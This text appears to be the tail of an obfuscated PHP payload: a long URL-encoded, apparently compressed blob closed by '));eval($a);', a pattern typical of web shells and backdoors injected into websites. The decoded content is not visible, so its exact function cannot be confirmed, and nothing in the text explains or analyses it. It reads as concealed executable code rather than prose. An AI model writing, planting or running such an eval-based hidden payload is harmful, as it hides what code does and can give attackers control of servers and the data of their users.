26%06%87%D00%0D%0C%A6P%11QR%F2%9C%FB8%11%AA%22%3ABRU%178%A3%98%B0%998%1Af%99%E6%9C%84%A4%C3%E9%AF%E839%FDISH%26%CA%23I%C6%B3_%96%F8%BCb%BA%CB%24%AB+%28.%83F8%24%C5%85%03%C8v%23%0B%2C%13%AC%82%9C%2Cg%D3%18%BA751%8D%95FDR1%21%23M%E9%B1%8D%0B2%2CW%8C%C3%C0%2B%E3%D3%D9%A4g%07%CC%1B2T%CE%92%5E%C5%C99%A5%7B.%7D%8F%C3%26%A9%28%87%DDA%0Fu%83%5D%D5%A4%91%97Qx%22%96%AE%98%F8o%85%D5%21E%FE%C9R%03%0F%A0%1B%12%06%0F%3C%B2%D2%C1%F6%A04%1B6%A4F%28%3C%BC%10%16z%21%7C%DD%CAC%8A%A1%F9%AD%1A%C3%7F%93Hhe%85%DBT%B8%BD%5C%E1u%2A%BC%5EV%F8k%FA%D1W%A2ur%C4%1FU%A3%BA%2B%82%2F%DD%BB%87%AC%12c%8A%C6%1Aa%1D%D8R_%B7%E3%D7%91%A6%3D%40%CCEC%03%2F%0B%08%8A%2Fq%25W%05%26%D3%EC%F1g%19%E4%1C%EE%E9C%A5%F1%06+%C6av%B6%A9%9E%CD%13%A9%87%B4%0B%FA%F4%D9%FC%2C%A20m%DD%BF%EF%F0%28Q%A2%81%5C%C1O%CEg%198%06%90YYXH%C1L%17%DA%29Y%92%91E%A0%DFB%DCN%2F3%0B%B2%98%C4%3C%C2%0A%3F%DD%A4%18+%18%C2%23%B5%99h%A7%E3%87d%25m%3E%84%8A%BA%2A%E7%E5%EC-%8D%2B%0A%AA%A9P%25-%99%1CS%89%7D%D2Nb%A5%FC%F4%D3O%94%9B%9Cn%3C%91%8F%91%BCz%253%D6h%16%8C%0AP%1B3%A1%84r%B9P%5D%BCn%B1%BE%C4p%BE%F1B%A3%27%B5%14s%25%C9%3C%A6%19%FC%F0k%DA%D8%BCw%7C%7EtV%FD%91%FC%0C%A6%B1%E1Y%2CCf%D1%99uE%CE%21M%FC%27%1E%9A%A9x%C14%F2%E1%90L%29%EA%E3D%D3%C4%FD%C9%DEK+%04%1B%AA%1F%A6%BD%D0%DF%CA%C7%F8%B80%80%B0j%C9z%0BSf%26%0F0%D4%C7%C2%F5%82C77%0D%B6%1DN%2C%D7%DD%A9%7E%A9L%3F%99%A0%8F%7EE3%00%3D2h%21I%02%15%E9%18%AA%60%8D6%0A%3A%1D%2F%92%28h%80%7DS1%9BD%28%2CA%8Bg%18%C3%3E%A9%10%87%A0S%E4%21%A5%1C%E5%A6%D6%0BcK-%11%0B9%9EL%96%B2h%F8%94%A3%5B%BB%05+%EF%0D%D1%AE%B4q%99%F1Vb%99y%A8%21M%2A%25%A8%0Cz%23m%BF%8B%B2%13%F2%B4%A3%C2PP%C0%9A%E9%14%1B%EA%CF%C7%EA%8F%CDVA%FD%E5%E6%08%26%D0%2C6G%C5%C0%40%C7%C8%A8%A0%05%05%7DkD%E2%A7o%3Bn%15%AB%11%D7%B15%B6%DE%2C%9FLq%A8%A40Q%0A%3A%89J%F0%05%A6%05l%253%E8%22%07c%F2%E6%D4%92X%FB%9A%04%0E%26%89%A9%04%B9jc%90%2By%87%15%27%85%40%10%03%E2%F5%81%01%C2%1A%7B%03%3D%60%DF1%3D%2B%21%C9%A5%86%8C%930%97%5C%88kg%05%C7%26%BC%AB%A8%A9q%3A%15%14S%23%10%E1%E8%EF%B0%D6%82%40%E50%CFs%92%C4%2C%A2%98%09%04%C3qO5%82I%D6%01%F3%1AH%267%DAbo%02%FB%8A%24%CDr%18n%8B%0E%FD%E3h%DE%8F%D1%3C%C21%F9a%14m%95%A0%99%EA%E0%EA%C2%AEdMF%C5%EBQ%26%E5_%EE%C0Se7%93%BD%3A%7C%7Dx%06%13%80%1D%1F%1Cpo%C6T%9F%7E%2C%9E%1Ae%87%DE%E5H%FC%96%C5%E27%81%86%A6%F1%86Y_o%16%05%B6%97Z%D6%F2KD%FA%CCL%8AF.%EB%96%0E%2A%1D%F72%11c%BBK%08%2Ai%A5A%1Dh%A5S%E2%23%16%C3%8F%9C%C8%B5%17%7B%21%A4r%3Ad%14M%7Dz%87%B6L%2C%87%91%FE%8A2%CA%7D%D7%7E%84%FF%15%E6%90%23%14E%88%84%02A%8F%9F%12KA%81%E7%9BB%B0%15N%83E%25U%2A%94F%22%90%1F%CDI%BB%7D%C3%23%85%92%98%5E%CA%FDF%B68F%AB%02%D4%A7k%AB%E3e%9A%07%16%C0%5DD%89%3A%AA%7E8%0D%3A%CByp%C5%91%0F%F9%B9%C12%BE.b%0CK%EE%21%E2%A7%FC%C0%3F%A6%BE%E0%2C%C3%05%9A+%60%BAQ%BF%C0%17E+%40%7F%3B%9D%D6%E3v%91%E2+%3F%8B%86oY%9F1%AEa%DF%C6mL%F6%13%CD%28%3BXm%7B%CD%11w%A7%BF%A1cW%D2%8A%D9%98%BA%DDh%EEQ%F2%C7%5EP-%DA%0C%D4%C4%9D%E9%05X%2C5%88k%E5%7CS%0C%23%AE_%94%5D%85%AAs%FBX%F1%08%25%E9%2FA%AE%EF%D0Q%E2%26%06+%D1%C6%CFCq%22nM%94%25%92%D4%E3%5D%B8%85%E8%25%D7%C7%D3%E9%1D%CC%94%D1%04v%01%24%FEq%0B%90%DA%1DP%90cz%C5%1F%E8w%08%29%D7%103%9B%C0L%ACJr%0B%A0%C4%00%1D%F3%04%3B%F0%DD%BF.%D2%FFu%EB%18%B9%84%E4%E2G%E2%1E%86N%A3%0B6%B9%FA%F8%AC%0B%D6%BB%D8%8A%19%C7_%25%5BH%A1%19s%FF%DA%EE%CF%22%5B%DB%1B%C5%22J%AC%99%29%A2%0D%1C%23XP%0E%226%9E7%AD%14%9D%FC%E9.z%26K%BD%BCV%D0%E2%CA%0C%D5i%D0%1Dk%7E%85%AE%0F%DA%A3%15U%7F%C3G%BF%81%9A%B8k%D6%D9ox%0A%F3%1B%DA%21%CEO%F7O%AA5%BAh%F5%1B%EE%0D%BB%7E%E0%5C%FD%86%3A%D2%8D%F6v%95T%1AJ%DD%F0E%A7%17%B0%AA%1C%E8%CC%865%CD%B4%C3%DB0%AC%88_a%0D%E8t_n%5D%C4%28%8B%85%C0%A4D%F3%5DxF%22%CC%CCm%80%CB%8D%DBr%08K%07%5D%BB%DFM%F8Z7%9E%B4%EF%96%96%A8%F8%EA%CA%12LmrN.%C8%A0%AC%91P%D8R%EC%3C%D3%D0g%18V%5C%C1t%D2%B1%60%0A%AA%B2O%E75%B1%7C6%16%FC7%13%E2%E2%C8%86U%27%B8%5C%1Cw%B5%82%8A%A3%8CI%D0%F5%3B%C6%E1%CD%FE%D5%E0%FD%D1M%B2n%BD%F4%7B%CE%A3%F9%C7%F7%2F%C3g%BF%FA%AD%7E%FB%7Ct%DE%7E%F4%BB%D5%7E%DB%3C%9E7%7Fy%F9%DC%1D%7F%7C%7Er%F3%E6%9D%3B%FB%F8%FEd%F8%E1%FD%C9U%CF%19%5D%FE%FA%F6%E5%8B%B7n8%7F%7Fz9%1A%BE%98%8F%3E%3Ew%DD_%F6%5E%1E%F4%A7%2F%AF%FA%BF%7B%A3%97%7B%07%FD%9Es%E8%13%8C%17O9%8C%F7GW%1F%DA%11%7D%7F%DFvg%BF%EC%9D%3C%3D%BF%1C%BC%7B%F7%E7%C1%E0%D5%DE%93K%EB%DD%C1%E5%C7%17%87%FE%E1%8B%EB%87%87%CFO%FC%8F%A7%23%E7%E4%FD%CB%9B%DE%FA%E1O%87%7B%BF%8E%DF%3F%7F%E0%FCr%16%1E%ED9%27%F3%FE%E4Q%B3%F7gk%0A8%F1%EF%ED%97%1B%BD%C9A%04u%A6%83%E7G%F3%977%97%3FC%7F%FE%EC%B5%8F%82%8F%EF%7F%F5%CE%9B%8F%9E%9D6%DF%9E%BF%DA%7B%FA%EB%89%FB%E8%E5%D9%25%7D%3F%3Bk%1E%BDz%DF%3A%3A%3F%BF%7C%FB%F4%ECt%3E%02%5C%A1%BD%93%AB_N%9F%3E%1C%EE%3D%05%9C%CE%BD%C3%CB%B77%D0%C6%CD%B1%F3%E4%F2%F0%ED%F5%EC%D0%21%D8%BF%F7%DA%1B%B3%8F%EF%8E%9A%BF%1C%1C%BD%F9%B5%19%1D%BC%DD%A3%FA%D4%BF%25%EA_%F5%9F%BF%9DA%DD%F3%93%7D%F7%18%FA%EF%BCq%3E%12%3E%27o%7F%E5%FD%9C%C0%B8%BC%7B%E0%9D%B7N%F6%CFZ%88oy%99%93%B7%2FO%B5e%A6G%1B%FD%F5%13%B7%07%B4%C9%8C%FB%9F%D6%DE%93%C8%3A%ED%D38%7Dh__%C1%F8%13%AC%D3%F3%07%B9g%88%03o%F3%28%EC%AD%1F%B9%1C%F7%B7%A7%E7%D0%1F%F5X%BD%E7L%07%5D%0Cw%B1%98%E1%BC%CB%F3%E6%F8%E0l%7F%FE%E8%D0y%E4X%EF%1E%40c%A3%D1%ABw%97%0E6n%BD%FB0%FAe%FF%291%C9%E1%B3%F9%E850%9B%7D%F3%D4%B5%9F%BB%CD_%9E%ED%FB%C77O%1F%E9%98%B6%2F%BE%FFr%F0%3A%7C%E9%3E%7D%FE%BE%E9%1E%031%E0%3B%0D%D4%10%3Aszr%7Ep%F4%EA%F9%C0%1D%88%01%FF0ug%1F%DE%B5%80%89%07%CD%0F%EBO%A6%BF%28%8C%7D%B8%F7%F2%D9%87w%1B%CD%C3%E7G7%1F%DF%1D4%3F%9E%3E%15%8Cu%82LN%8C%06%DF%E9Yo%FD%29%B5%0B%0C%F7%1A%18K0%C6%F5%D9Y%EB%D1%E9%C9%DB%B7g%D0%EE%FE%C9%C1a%08%7D%C1z%D0%E7%8DK%2C%CFq%C6%09%F0r%08t%F0%5E%EE%1F%9C%9E%B4%3E%F6%5E%1F4%C3%D3%F3%8D%A70%BC%A7%EF%9B%07%C7%EFN%2F%95%09%F2%C4%F9%B5%7D0%1B%EC%3D%25f%3A%7C%01%7F%A71N%A1%F5%FE%A8I%CCq3%FFSa%C8%D1%E1%E5%D1%B87%FDu%D4%7B%EE%FE9%C8%D7%5B%B7%9E%BB%21L%A4k%A8%03%BF%BD%97%1F%DE%1D%FD%FE%F1%3D%F4k%FF%E8%CD%D9%E5%83%F0%9C%26%97%F7%12%C6%C7%3B%3C%1D%5D%F6%9F%BB%97o%DE%7D%BC%EAOB_%D6%D9%7B%97%E0%D7%83%09z%F8%9C%DE%3B%87%CF%DD%C9%E1%DE%08%26%C9%DB%09%F4%DD%FD%08%13%1F%EB%13c%8D._%02%FD%DC%9E%F3%F4%EC%ED%FE%C9%CB3g%EE%BC%D9%FB%F8%EC%AC%B9q%7C%F8%7B%EE%FD%9B%B70%A6%87%BF%3F%98%FC%DA%7Ct%7CF%B8c%BB4%21F%C9%848%BC%FF%F2%92%F0%26%9E%DA%FB%D5%05%FEy%FB%FB%E1%DE%C9%D9%E9%FE%DB%D7g%7B%09%5D%FA%2F%807%81.%1C%5EL%5B%2A%3Fx%7F%E2%C6u%0E%60%12%0B%7C%C4%04%E1u%C4%B3%8F%EF%C7%FE%60%EF%C9%9C%DA%7B%DF%84%09%D8%ECd%93%90%18%E8%19%27%E48%A3e%B8%D87.%E5%1C7%1D%92%FD%FB%94%2B%12%17%A9%D8%DEf%CF%F7M%9E%C5%83%02%ED%EA%F2%95%5D%18%04%91G-%83%99J%81i0%98%F8%1A%CC%DB%B5p%CC%3E%F9v%E0%7EN%0E%8D%D6%B0%FC%1B%0Cl%9C%B2m%9A%A8%26%C8%F3%0A%84%11%1FW%AC%B7%D6%D7%7F%CE%18%F1%F3%BA%03%22%C1%D5%87%5Bu%B0%2F%3B%C8C%B6%A9%89K%96%EB2%2C%88%ABbAd%FA%BE%8Ahr%C5%BD%15%F1x%15%D7%B8%24v%FE%C9%FE%EB%E3%B3%FD%EE%93g%CFN%D0%1Ai%00%1D%FEI%DAe%8Ck9%BF%24mV%87%24%A8%14%3A%C0%D6%2B%91V%0B%9B%2B%8E%B1CJ%B2%CD%BC%00%9Edo%85S%E2%60%406N%1C%5C%94%98y%AE9%14%C5O%9C%83%7B%5E%DF%C5%A3%D0%9F%1Et%076%CF%C9%17-%CC%AF%3C_%98%DB2%A7%8E%E6%B4Q%9C5Z%9F%F5a%D5X%8B%26%FEZ%CFo%F8%AEQWW6%5D%1AcL%E3%D1a%3C%0D%86%81%9C%C5%92%DA%2C%7B%98%C0Z%3Bk%03%FBj%0D%F9%9A%92%D5%B1%1Ft%7B%8C%D0%B5m%BF%AA%8B%E4.%C4%88%5E%D9E%5C%92%9C%1C%86%1F2kv%CD%FEb%A3%C0%F6%19%EFN%0D%0F4P%DF%D5l%EBD%BA%05%B5%F7Y%87%E3%C5T%ED%2F%A2j_P5%A5%A3%DE%86%B0%7D-a%95%07%EB%FF6%A5%FB%B7%A3t%BF%94%D2%DFh%F7p%B2%97%CB%E2%98%DA%A1%E5.%A0X%F1%1D%A9%1C%FA%C6%8Cb%94%A1y%CF%1F%FB%5D%FAU%AD%D5%F3%E5%F0-%06%8C%84%F6ei%F1S%5B%3C%B4%86%F6%04D%00%95%DDu%A6%0E%86l%AA%9A%F8%B8%8B%CF3%87%2C%DA%DCuv%00%DB1%E7O%10%12%96%BA%05%D3n%E2%40%B8%16%E5%3B%FF%AAP%12c%BEe%12%DAQ%0E%0B%8D%00%16%A9%B3%BB%9C%E6d%DF%C9%89N%FE%8E%CER3%C5%D3%DDS%1A%A3%7Dq%AA%AC%A2XdM%98%E9z%E6%A9%DD%3F%9C%0E%3D%C10%9A%AC%B6%960D%95%21%AA%EFw%DFr%DD.ZU%BAX%B7%A8%02o%98_%C7%F8%3F"));eval($a);